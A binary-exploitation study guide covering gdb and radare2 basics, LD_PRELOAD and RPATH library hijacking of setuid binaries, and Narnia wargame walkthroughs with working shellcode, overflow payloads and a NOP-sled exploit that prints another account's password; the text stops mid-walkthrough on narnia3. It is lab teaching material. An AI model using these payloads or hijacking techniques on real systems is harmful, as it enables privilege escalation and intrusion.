eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a : eip is the register for next instruction to execute (also called program counter). so at this moment, the next to execute is at “0x804877f”, which is line 16 of testing.cpp.
saved eip “0x804869a” is so called “return address”, i.e., the instruction to resume in caller stack frame after returning from this callee stack. It is pushed into stack upon “CALL” instruction (save it for return).
called by frame at 0xb75f73b0 : the address of the caller stack frame
source language c++ : which language in use
Arglist at 0xb75f7388, args: this=0x0 : the starting address of arguments
Locals at 0xb75f7388 : address of local variables.
Previous frame’s sp is 0xb75f7390 : this is where the previous frame´s stack pointer point to (the caller frame), at the moment of calling, it is also the starting memory address of called stack frame.
Saved registers : These are the two addresses on the callee stack, for two saved registers.
ebp at 0xb75f7388 : the stack address where the ebp register of the caller's stack frame is saved (please note, it is the saved register value, not the caller's stack address), i.e. it corresponds to “PUSH %ebp”. “ebp” is usually treated as the base address for the locals of this stack frame, which are addressed by offset from it. In other words, the operations on local variables all use this “ebp”, so you will see something like mov -0x4(%ebp), %eax, etc.
eip at 0xb75f738c : the stack address where the saved eip mentioned before is stored (it contains the return address “0x804869a”).
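The addresses in this output are related by fixed offsets on 32-bit x86 with a standard frame pointer prologue. The following sketch reproduces that arithmetic from the "ebp at" value alone; it assumes 4-byte stack slots and the usual push ebp prologue.

```python
saved_ebp_slot = 0xb75f7388            # "ebp at" from info frame
saved_eip_slot = saved_ebp_slot + 4    # return address sits just above saved ebp
frame_address = saved_ebp_slot + 8     # "frame at", also the previous frame's sp

print(hex(saved_eip_slot), hex(frame_address))
```

In a stack overflow this is why the bytes right after the saved ebp are the ones that end up in EIP.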
Examining Registers
We can refer to machine register contents, in expressions, as variables with names starting with ‘$’. The names of registers are different for each machine; use info registers to see the names used on your machine.
info registers : Print the names and values of all registers except floating-point registers (in the selected stack frame).
info all-registers : Print the names and values of all registers, including floating-point registers.
info registers regname … : Print the relativized value of each specified register regname. As discussed in detail below, register values are normally relative to the selected stack frame. regname may be any register name valid on the machine you are using, with or without the initial ‘$’.
Setting program variable
Either
set variable i = 10
or update an arbitrary (writable) location by address
(gdb) set {int}0x83040 = 4
Radare2 Basics
r2 -Ad ./crackme0x01 : Opens r2 in debug mode with the Analyze all flag active
afll : Lists all functions and their location in memory
s sym.main : Seeks to function sym.main. Address in prompt will change
pdf @ sym.main (which means something like “show me the main function without seek to it”) could be used.
pdf : "Print Disassembling Function"
iz : Shows the strings present in the data section. One can use izz to see the strings for the entire binary
db 0x12345678 : Sets a breakpoint at address 0x12345678. It's possible to set more than one breakpoint
dc : Runs the program until it hits a breakpoint
dr : Shows the content of all registers. Use dr <register> for a specific register
afvd : Shows the content of all local/args variables
pf : Prints formatted data. Use pf?? to see available formats and pf??? for examples
? 0x10 : Converts the number 0x10 to the most common bases
Appendix-II LD_PRELOAD
Hijacking Functions
Let’s say there’s a function getrand which generates a random path for the files to be stored
int getrand(char **path)
{
char *tmp;
int pid;
int fd;
srandom(time(NULL));
tmp = getenv("TEMP");
pid = getpid();
asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
'A' + (random() % 26), '0' + (random() % 10),
'a' + (random() % 26), 'A' + (random() % 26),
'0' + (random() % 10), 'a' + (random() % 26));
fd = open(*path, O_CREAT|O_RDWR, 0600);
unlink(*path);
return fd;
}
If we see the above function, getpid figures out the PID of the program, unlink deletes the file and random provides a random number.
We also need to check if the binary is dynamically linked or not?
file /home/flagXX/flagXX
/home/flagXX/flagXX: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
If so, then we can create a C file to override the functions we want: random(), unlink() and getpid():
hacking_randomfile.c
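#include <sys/types.h>
// Take control of random; the real prototype is long random(void)
long random(void) {
    return 0;
}
// Stop the file being deleted
int unlink(const char *pathname) {
    return 0;
}
// Take control of the reported PID; the real prototype is pid_t getpid(void)
pid_t getpid(void) {
    return 1;
}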
Now, we need to compile this with
gcc hacking_randomfile.c -o hacking_randomfile -shared -fPIC
Using gcc we’ve specified the normal input file (hacking_randomfile.c) and output file (-o hacking_randomfile), but we’ve also specified two additional options:
-shared to make a library and
-fPIC to specify Position Independent Code, which is necessary for making a shared library.
Now that we’ve built hacking_randomfile as a shared library, here’s the basic usage:
$ LD_PRELOAD="$PWD/hacking_randomfile" ./main_targetfile
SANS has written a blog about Go To The Head Of The Class: LD_PRELOAD For The Win
Important things to note
The function definition should be correct.
The function's argument types and return type should also be correct.
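With random() pinned to 0 and getpid() pinned to 1, the file name built by getrand stops being random. The following is a minimal Python 3 sketch that rebuilds the name from the same format string; `predicted_path` is a hypothetical helper name, and `/tmp` is only an assumed value for the TEMP environment variable.

```python
def predicted_path(temp_dir, pid=1, rnd=0):
    """Rebuild the name getrand() produces when getpid() returns `pid`
    and every call to random() returns `rnd`."""
    # Same six (base character, modulus) pairs as the asprintf() call.
    pattern = [("A", 26), ("0", 10), ("a", 26), ("A", 26), ("0", 10), ("a", 26)]
    suffix = "".join(chr(ord(base) + rnd % mod) for base, mod in pattern)
    return "%s/%d.%s" % (temp_dir, pid, suffix)


# Assumed TEMP=/tmp; with the hooks above this prints /tmp/1.A0aA0a
print(predicted_path("/tmp"))
```

Because unlink() is also overridden, the file at that path is still there after the target binary exits.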
Controlling uninitialized memory with LD_PRELOAD
Dan Rosenberg has documented this technique in Controlling uninitialized memory with LD_PRELOAD. The text below is taken directly from that blog post.
A local Linux user can exercise a degree of control over uninitialized memory on the stack when executing a program. This happens because of the way the Linux linker/loader, ld.so, handles the LD_PRELOAD environment variable. This variable allows users to specify libraries to be preloaded, effectively allowing users to override functions used in a particular binary. However, regardless of whether or not libraries specified via LD_PRELOAD are actually loaded at runtime, ld.so copies the name of each library onto the stack prior to executing the program, and doesn’t clean up after itself. By specifying a very long LD_PRELOAD variable and executing a binary, a portion of the stack will be overwritten with part of the LD_PRELOAD variable during linking, and it will stay that way once execution of the program begins, even on setuid binaries, where the library itself is not loaded.
This means we can initialise the memory to something under our control:
$ export LD_PRELOAD=`python -c 'print "/bin/getflag\x0a"*1000'`
i.e. fill the stack with one thousand /bin/getflags.
Then when we run flagXX with length of 1, it will almost certainly have this in the buffer already:
$ echo -ne "Content-Length: 1\n " | /home/flagXX/flagXX
sh: !getflag: command not found
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
... lots of repeats ...
sh: line 74: /bin/getfl=qm: No such file or directory
Of course, the LD_PRELOAD variable is ignored with setuid binaries, since otherwise an attacker could trivially override arbitrary functions in setuid binaries and easily take control of a system.
LIBC - Rpath
If there exists a suid binary with an RPATH pointing at a directory we control, we can get code execution. Let’s first read what rpath is.
RPATH
rpath designates the run-time search path hard-coded in an executable file or library. Dynamic linking loaders use the rpath to find required libraries. Specifically it encodes a path to shared libraries into the header of an executable (or another shared library). This RPATH header value (so named in the Executable and Linkable Format header standards) may either override or supplement the system default dynamic linking search paths.
Libraries loaded from the run-time path defined by RPATH won’t disable setuid execution the way LD_PRELOAD would. So we can inject our own libc.so.6 (using version GLIBC_2.0 as required by the binary) in the RPATH directory and hook any of the used functions to execute our setuid shell.
We can use readelf to check the dynamic section of a binary
readelf -d flagXX
Dynamic section at offset 0xf20 contains 21 entries:
Tag Type Name/Value
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flagXX]
0x0000000c (INIT) 0x80482c0
In the above example, we can see that RPATH is defined as /var/tmp/flagXX, so the binary tries to load the libc.so.6 from that location.
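The check above can be scripted. This is a minimal Python 3 sketch that pulls the RPATH (or RUNPATH) directories out of `readelf -d` output and reports which ones the current user can write to. The helper names `rpath_dirs` and `writable_dirs` are made up for illustration, and the sample text is just the excerpt shown above.

```python
import os
import re

# Matches lines such as: 0x0000000f (RPATH)  Library rpath: [/var/tmp/flagXX]
RPATH_RE = re.compile(r"\((RPATH|RUNPATH)\)\s+Library (?:rpath|runpath): \[(.*?)\]")


def rpath_dirs(readelf_output):
    """Return every directory listed in RPATH/RUNPATH entries."""
    dirs = []
    for line in readelf_output.splitlines():
        match = RPATH_RE.search(line)
        if match:
            # Several directories may be joined with ':'
            dirs.extend(p for p in match.group(2).split(":") if p)
    return dirs


def writable_dirs(dirs):
    """Keep only the directories that exist and that we may write to."""
    return [d for d in dirs if os.path.isdir(d) and os.access(d, os.W_OK)]


sample = """\
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flagXX]
0x0000000c (INIT) 0x80482c0
"""
print(rpath_dirs(sample))
```

In practice the input would come from running `readelf -d` on the target; a directory that shows up in `writable_dirs` is a candidate location for a fake libc.so.6.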
Let’s see what are the functions the binary utilizes from libc
objdump -R flagXX
flagXX: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049ff0 R_386_GLOB_DAT __gmon_start__
0804a000 R_386_JUMP_SLOT puts
0804a004 R_386_JUMP_SLOT __gmon_start__
0804a008 R_386_JUMP_SLOT __libc_start_main
If RPATH is writeable, we can possibly get a shell by creating a fake libc.so and defining fake __libc_start_main function with
system("/bin/sh");
to get a shell. We may also refer to Linux x86 Program Start Up or - How the heck do we get to main()? to understand what happens when we execute a Linux binary (shared, not static).
__libc_start_main
From linuxbase: The __libc_start_main() function shall perform any necessary initialization of the execution environment, call the main function with appropriate arguments, and handle the return from main(). If the main() function returns, the return value shall be passed to the exit() function.
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end));
__gmon_start__
The function call_gmon_start initializes the gmon profiling system. This system is enabled when binaries are compiled with the -pg flag, and creates output for use with gprof(1). In the case of the scenario binary call_gmon_start is situated directly proceeding that _start function. The call_gmon_start function finds the last entry in the Global Offset Table (also known as __gmon_start__) and, if not NULL, will pass control to the specified address. The __gmon_start__ element points to the gmon initialization function, which starts the recording of profiling information and registers a cleanup function with atexit(). In our case however gmon is not in use, and as such __gmon_start__ is NULL.
Version Reference
glibc versions the symbols it exports (for example GLIBC_2.0), and a binary records which versions it requires. A replacement libc.so.6 has to provide those versions.
Check the glibc version required by the binary
objdump -p flagXX
flagXX: file format elf32-i386
Version References:
required from libc.so.6:
0x0d696910 0x00 02 GLIBC_2.0
or
objdump -T flagXX
flagXX: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
080484cc g DO .rodata 00000004 Base _IO_stdin_used
Check the glibc version on your Linux machine
ldd --version
ldd (Debian GLIBC 2.26-2) 2.26
If you get error like “no version information available”, create a file version.ld with the version required.
cat version.ld
GLIBC_2.0 {
};
and link it while compiling
gcc -shared -static-libgcc -fPIC -Wl,--version-script=version.ld,-Bstatic shell.c -o libc.so.6
LD_DEBUG environment variable
If the LD_DEBUG variable is set then the Linux dynamic linker will dump debug information which can be used to resolve most loading problems very quickly. To see the available options just run any program with the variable set to help, i.e.:
LD_DEBUG=help cat
Valid options for the LD_DEBUG environment variable are:
libs display library search paths
reloc display relocation processing
files display progress for input file
symbols display symbol table processing
bindings display information about symbol binding
versions display version dependencies
all all previous options combined
statistics display relocation statistics
unused determined unused DSOs
help display this help message and exit
If you want to debug a binary
LD_DEBUG=all ./flagXX
4796:
4796: file=libc.so.6 [0]; needed by ./flagXX [0]
4796: find library=libc.so.6 [0]; searching
4796: search path=/var/tmp/flagXX/tls/i686/sse2/cmov:/var/tmp/flagXX/tls/i686/sse2:/var/tmp/flagXX/tls/i686/cmov:/var/tmp/flagXX/tls/i686:/var/tmp/flagXX/tls/sse2/cmov:/var/tmp/flagXX/tls/sse2:/var/tmp/flagXX/tls/cmov:/var/tmp/flagXX/tls:/var/tmp/flagXX/i686/sse2/cmov:/var/tmp/flagXX/i686/sse2:/var/tmp/flagXX/i686/cmov:/var/tmp/flagXX/i686:/var/tmp/flagXX/sse2/cmov:/var/tmp/flagXX/sse2:/var/tmp/flagXX/cmov:/var/tmp/flagXX (RPATH from file ./flagXX)
4796: trying file=/var/tmp/flagXX/tls/i686/sse2/cmov/libc.so.6
ulimit
ulimit User limits - limit the use of system-wide resources.
Syntax
ulimit [-acdfHlmnpsStuv] [limit]
Options
-S Change and report the soft limit associated with a resource.
-H Change and report the hard limit associated with a resource.
-a All current limits are reported.
-c The maximum size of core files created.
-d The maximum size of a process's data segment.
-f The maximum size of files created by the shell(default option)
-l The maximum size that can be locked into memory.
-m The maximum resident set size.
-n The maximum number of open file descriptors.
-p The pipe buffer size.
-s The maximum stack size.
-t The maximum amount of cpu time in seconds.
-u The maximum number of processes available to a single user.
-v The maximum amount of virtual memory available to the process.
ulimit provides control over the resources available to the shell and to processes started by it, on systems that allow such control.
The soft limit is the value that the kernel enforces for the corresponding resource. The hard limit acts as a ceiling for the soft limit.
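The soft/hard distinction can also be inspected from a script. This is a small Python 3 sketch using the standard `resource` module (Unix only), looking at the core-file limit that `ulimit -c` controls. The function names are hypothetical helpers, not part of any tool mentioned here.

```python
import resource


def core_limits():
    """Return (soft, hard) for core files, like `ulimit -Sc` and `ulimit -Hc`."""
    return resource.getrlimit(resource.RLIMIT_CORE)


def raise_core_limit():
    """Raise the soft limit up to the hard limit.

    An unprivileged process may move its soft limit anywhere up to the
    hard limit, but it cannot raise the hard limit itself."""
    soft, hard = core_limits()
    resource.setrlimit(resource.RLIMIT_CORE, (hard, hard))
    return core_limits()


def describe(value):
    """Render a limit value the way the shell does."""
    return "unlimited" if value == resource.RLIM_INFINITY else str(value)


soft, hard = core_limits()
print("core file size: soft=%s hard=%s" % (describe(soft), describe(hard)))
```

Calling `raise_core_limit()` in a process whose hard limit is unlimited has the same effect, for that process and its children, as `ulimit -c unlimited` in a shell.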
Appendix-III Basic Concepts
The below has been completely taken from Binary Exploitation CTF101
Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program’s functions.
Registers
A register is a location within the processor that is able to store data, much like RAM.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not “general purpose registers” (GPRs).
On x86, the only 2 reserved registers are
rip, which holds the address of the next instruction to execute, and
rsp, which holds the address of the stack.
On x86, the same register can have different sized accesses for backwards compatibility. For example,
the rax register is the full 64-bit register,
eax is the low 32 bits of rax,
ax is the low 16 bits,
al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-15 of rax).
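The sub-register layout is just masking and shifting. Here is a short Python 3 sketch that shows which bits each name refers to; the value loaded into rax is an arbitrary example and `sub_registers` is a hypothetical helper.

```python
def sub_registers(rax):
    """Return the views of a 64-bit rax value that the smaller names expose."""
    return {
        "rax": rax & 0xFFFFFFFFFFFFFFFF,  # all 64 bits
        "eax": rax & 0xFFFFFFFF,          # low 32 bits
        "ax": rax & 0xFFFF,               # low 16 bits
        "al": rax & 0xFF,                 # bits 0-7
        "ah": (rax >> 8) & 0xFF,          # bits 8-15
    }


views = sub_registers(0x1122334455667788)
for name, value in views.items():
    print("%-3s = %#x" % (name, value))
```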
Stack
In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
The esp/rsp register holds the address in memory where the bottom of the stack resides (its lowest address, which is where the most recently pushed value lives).
When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory.
Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).
Note: The stack “grows” down to lower memory addresses!
Conventionally, ebp/rbp contains the address of the top of the current stack frame (its highest address, the frame base), and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp.
A stack frame is essentially just the space used on the stack by a given function.
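The push and pop behaviour described above can be modelled in a few lines. This is a toy Python 3 sketch of a 32-bit stack, not an emulator: the class name `Stack32` and the starting esp value are arbitrary choices for illustration.

```python
class Stack32:
    """Toy model of the 32-bit x86 stack: esp plus a sparse memory map."""

    def __init__(self, esp=0xFFFFD000):
        self.esp = esp
        self.memory = {}

    def push(self, value):
        # push: esp moves DOWN by 4 first, then the value is stored at esp
        self.esp -= 4
        self.memory[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        # pop: read the value at esp, then esp moves UP by 4
        value = self.memory[self.esp]
        self.esp += 4
        return value


stack = Stack32()
start = stack.esp
stack.push(0x41414141)
stack.push(0xDEADBEEF)
print(hex(stack.esp))    # 8 bytes below the starting esp
print(hex(stack.pop()))  # last value pushed comes out first
```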
Uses
The stack is primarily used for a few things:
Storing function arguments
Storing local variables
Storing processor state between function calls
Example
Let’s compile a simple program and check for stack
#include <stdio.h>
void say_hi(const char * name) {
printf("Hello %s!\n", name);
}
int main(int argc, char ** argv) {
char * name;
if (argc != 2) {
return 1;
}
name = argv[1];
say_hi(name);
return 0;
}
gcc -g hello.c -o hello
Put a breakpoint at the call to the say_hi function.
Check what the esp and ebp values are.
When a call instruction is executed, it first pushes the return address (the address of the instruction after the call) onto the stack, then jumps to its destination.
The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be.
Calling Conventions
To be able to call functions, there needs to be an agreed-upon way to pass arguments.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit.
cdecl
In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {
return a + b + c;
}
would be invoked by pushing c, then b, then a.
SysV
For 64-bit binaries, function arguments are first passed in certain registers:
RDI
RSI
RDX
RCX
R8
R9
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
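The two conventions can be compared side by side. This is a rough Python 3 sketch of where each argument ends up; it only models integer and pointer arguments (floating-point arguments use other registers under SysV), and both function names are hypothetical.

```python
SYSV_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def cdecl_push_order(args):
    """cdecl: everything goes on the stack, pushed last argument first."""
    return list(reversed(args))


def sysv_placement(args):
    """SysV: first six arguments in registers, the rest pushed in reverse."""
    in_registers = dict(zip(SYSV_REGS, args))
    pushed = list(reversed(args[len(SYSV_REGS):]))
    return in_registers, pushed


print(cdecl_push_order(["a", "b", "c"]))
registers, pushed = sysv_placement([1, 2, 3, 4, 5, 6, 7, 8])
print(registers)
print(pushed)
```

For the add(a, b, c) example, cdecl pushes c, b, a, while SysV puts a, b, c in rdi, rsi, rdx and pushes nothing.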
Global Offset Table
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. Common functions (like those in libc) are “linked” into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of function to address in dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however functions are not mapped to their actual code until they’re first called. For example, in the following C snippet puts won’t be resolved to an address in libc until after it has been called once:
int main() {
puts("Hi there!");
puts("Ok bye now.");
return 0;
}
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls “short circuit” straight to their implementation bypassing the dynamic resolver.
This has two important implications:
The GOT contains pointers to libraries which move around due to ASLR
The GOT is writable
PLT
Before a function’s address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small “stub” function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
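Lazy binding is easier to picture with a toy model. This Python 3 sketch treats the GOT as a dictionary whose slots initially point at a PLT-like stub; the first call resolves the function and patches the slot. The `Program` class and the `LIBC` table are invented for illustration and ignore how real PLT entries are encoded.

```python
LIBC = {"puts": print}  # stand-in for the functions a shared library exports


class Program:
    def __init__(self, imports):
        self.resolver_calls = 0
        # Before resolution, every GOT slot points at its PLT stub.
        self.got = {name: self._make_stub(name) for name in imports}

    def _make_stub(self, name):
        def stub(*args):
            # The stub asks the "dynamic linker" for the real address,
            # writes it into the GOT, then forwards the call.
            self.resolver_calls += 1
            self.got[name] = LIBC[name]
            return self.got[name](*args)
        return stub

    def call(self, name, *args):
        # Every call goes through whatever the GOT slot currently holds.
        return self.got[name](*args)


prog = Program(["puts"])
prog.call("puts", "Hi there!")    # resolved on this first call
prog.call("puts", "Ok bye now.")  # goes straight to the real function
print("resolver ran", prog.resolver_calls, "time(s)")
```

The last implication in the list above falls out of the model: because `prog.got` is writable, assigning another callable to `prog.got["puts"]` redirects every later call, which is the idea behind a GOT overwrite.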
Buffer
A buffer is any allocated space in memory where data (often user input) can be stored.
In the following C program name would be considered a stack buffer:
#include <stdio.h>
#include <unistd.h> // for read()
int main() {
char name[64] = {0};
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Buffers could also be global variables:
#include <stdio.h>
char name[64] = {0};
int main() { code_snippet }
Or dynamically allocated on the heap like
char *name = malloc(64);
memset(name, 0, 64);
Buffer Overflow Examples
Let’s see a simple example of binary exploitation, Narnia0, where we have to overwrite the value of a variable.
#include <stdio.h>
#include <stdlib.h>
int main(){
    long val=0x41414141;
    char buf[20];
    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);
    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);
    if(val==0xdeadbeef)
        system("/bin/sh");
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }
    return 0;
}
In this example, the value of the variable val can be overwritten by overflowing buf: buf holds 20 bytes, but scanf reads up to 24 characters, so the last four land in val. If you directly type 20 “A”s followed by the address at the prompt, it won’t work: the escape sequences arrive as literal characters rather than raw bytes, so val doesn’t match. So, we have to use the python print command. If we use
python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0
you will see that the value matches, but the shell exits immediately because its standard input reaches end-of-file as soon as python finishes. To keep the shell active, we need to use cat as shown below:
(python -c 'print "A"*20 + "\xef\xbe\xad\xde"';cat) | ./narnia0
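The one-liners above rely on Python 2, where print writes raw bytes. Under Python 3 the same print would encode \xef and friends as UTF-8 and corrupt the payload, so here is a minimal Python 3 sketch of the same payload that writes bytes directly. The function name `narnia0_payload` is made up for illustration.

```python
import struct
import sys


def narnia0_payload(buf_size=20, target=0xDEADBEEF):
    """Fill buf, then append the new value of val in little-endian order."""
    return b"A" * buf_size + struct.pack("<I", target)


if __name__ == "__main__":
    # Write raw bytes; print() would re-encode the non-ASCII characters.
    sys.stdout.buffer.write(narnia0_payload() + b"\n")
```

Saved under an assumed name such as payload.py, it would slot into the same pipeline: `(python3 payload.py; cat) | ./narnia0`. `struct.pack("<I", ...)` also makes the little-endian byte order explicit instead of reversing the bytes by hand.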
Another example is Narnia1:
#include <stdio.h>
int main(){
    int (*ret)();
    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }
    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();
    return 0;
}
We need to set an environment variable EGG containing shellcode. Previously, I tried with
export EGG="\bin\sh"
and
export EGG="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
The shellcode was taken from the Shell-Storm website. However, both failed with a segmentation fault, because the shell stores the backslash sequences as literal text rather than as raw bytes. superkojiman and barrebas helped me and told me that if I write
export EGG=`python -c 'print "\xCC"'`
it should SIGTRAP. \xCC acts as a software breakpoint (an INT3 instruction). It tells you whether your shellcode is stored properly and executed: if the program receives SIGTRAP, you know you have properly redirected execution to your shellcode. You can also put \xCC anywhere in the shellcode; if it crashes before reaching \xCC, you know for sure that your shellcode has bad characters. They suggested exporting the EGG variable as
export EGG=`python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`
and it worked like a charm.
Another example is Narnia2:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
    char buf[128];
    if(argc == 1){
        printf("Usage: %s argument\n", argv[0]);
        exit(1);
    }
    strcpy(buf,argv[1]);
    printf("%s", buf);
    return 0;
}
It’s easy to see that a buffer overflow vulnerability exists, because strcpy copies argv[1] into buf without a length check. Let’s find the offset of the saved return address.
ulimit -c unlimited
./narnia2 `/usr/share/metasploit-framework/tools/pattern_create.rb 200`
Segmentation fault (core dumped)
gdb -q -c core ./narnia2
#0 0x37654136 in ?? ()
/usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
[*] Exact match at offset 140
narnia2@melinda:~$ gdb -q /narnia/narnia2
(gdb) disassemble main
Dump of assembler code for function main:
**Snip**
0x080484a0 <+67>: mov %eax,(%esp)
0x080484a3 <+70>: call 0x8048320 <strcpy@plt>
**Snip**
End of assembler dump.
(gdb) br *main+70
Breakpoint 1 at 0x80484a3
(gdb) run `python -c 'print "A"*140 + "BBBB"'`
Starting program: /games/narnia/narnia2 `python -c 'print "A"*140 + "BBBB"'`
Breakpoint 1, 0x080484a3 in main ()
(gdb) n
0x42424242 in ?? ()
Let’s look at the stack after the strcpy, which tells us a probable address to redirect execution to.
(gdb) x/80xw $esp+400
0xffffd7e0: 0x0000000f 0xffffd80b 0x00000000 0x00000000
0xffffd7f0: 0x00000000 0x00000000 0x1d000000 0xa9c79d1b
0xffffd800: 0xe1a67367 0xc19fc850 0x6996cde4 0x00363836
0xffffd810: 0x2f000000 0x656d6167 0x616e2f73 0x61696e72
0xffffd820: 0x72616e2f 0x3261696e 0x41414100 0x41414141
0xffffd830: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd840: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd850: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd860: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd870: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd880: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd890: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd8a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd8b0: 0x41414141 0x42424241 0x44580042 0x45535f47
0xffffd8c0: 0x4f495353 0x44495f4e 0x3939383d 0x53003733
Let’s pick a shellcode from Shell-Storm for a Linux x86 execve /bin/sh and calculate the number of NOPs
narnia2@melinda:~$ python -c 'print len("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")'
23
narnia2@melinda:~$ bc
140-23
117
narnia2@melinda:~$ /narnia/narnia2 `python -c 'print "\x90"*117 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x50\xd8\xff\xff"'`
$ cat /etc/narnia_pass/narnia3
**********
$
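The arithmetic above (offset 140, shellcode 23 bytes, 117 NOPs, then the return address) can be wrapped in a small helper. This is a Python 3 sketch; `sled_payload` is a hypothetical name, and 0xffffd850 is simply the address used in the command above, which lands inside the buffer on that particular machine.

```python
import struct

# execve("/bin/sh") shellcode exactly as used in the command above (23 bytes)
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def sled_payload(offset, shellcode, ret_addr):
    """NOP sled + shellcode padded to `offset`, then the new return address."""
    nops = offset - len(shellcode)
    if nops < 0:
        raise ValueError("shellcode does not fit before the return address")
    return b"\x90" * nops + shellcode + struct.pack("<I", ret_addr)


payload = sled_payload(140, SHELLCODE, 0xFFFFD850)
print(len(SHELLCODE), 140 - len(SHELLCODE), len(payload))
```

Since the payload is raw bytes, one way to pass it as an argument from Python 3 would be `subprocess.run([b"/narnia/narnia2", payload])`. Stack addresses can shift with the environment and argument length, so the return address usually needs re-checking in gdb.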
Another example is Narnia3:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
    int ifd, ofd;
    char ofile[16] = "/dev/null";
    char ifile[32];
    char buf[32];
    if(argc != 2){
        printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
        exit(-1);
    }
    /* open files */
    strcpy(ifile, argv[1]);
    if((ofd = open(ofile,O_RDWR)) < 0 ){
        printf("error opening %s\n", ofile);
        exit(-1);
    }
    if((ifd = open(ifile, O_RDONLY)) < 0 ){
        printf("error opening %s\n", ifile);
        exit(-1);
    }
    /* copy from file1 to file2 */
    read(ifd, buf, sizeof(buf)-1);
    write(ofd,buf, sizeof(buf)-1);
    printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);
    /* close 'em */
    close(ifd);
    close(ofd);
    exit(1);
}
Superkojiman’s notes explain this best; they are copied here with permission. Thanks superkojiman :)
narnia3@melissa:/narnia$ ./narnia3 /etc/motd
copied contents of /etc/motd to a safer place... (/dev/null)
We can use this program to read the contents of /etc/narnia_pass/narnia4, but the output is written to /dev/null. We control the input file and the output file is set as /dev/null. However, because of the way the stack is laid out, we can write past the ifile buffer and overwrite the value of ofile. This lets us replace /dev/null with another file of our choosing. Here’s what the stack looks like:
+---------+
| ret     |
| sfp     |
| ofd     |
| ifd     |
| ofile   |
| ifile   |
| buf     |
+---------+ <- esp
ifile is a 32-byte array and, in the source above, ofile is a 16-byte array placed directly after it. We can compile the program with -ggdb and examine it in gdb
# gcc -ggdb -m32 -fno-stack-protector -Wl,-z,norelro narnia3.c -o narnia3
# gdb -q narnia3
If we disas main, we can see that strcpy is called at *main+100:
0x08048551 <+93>: lea 0x38(%esp),%eax
0x08048555 <+97>: mov %eax,(%esp)
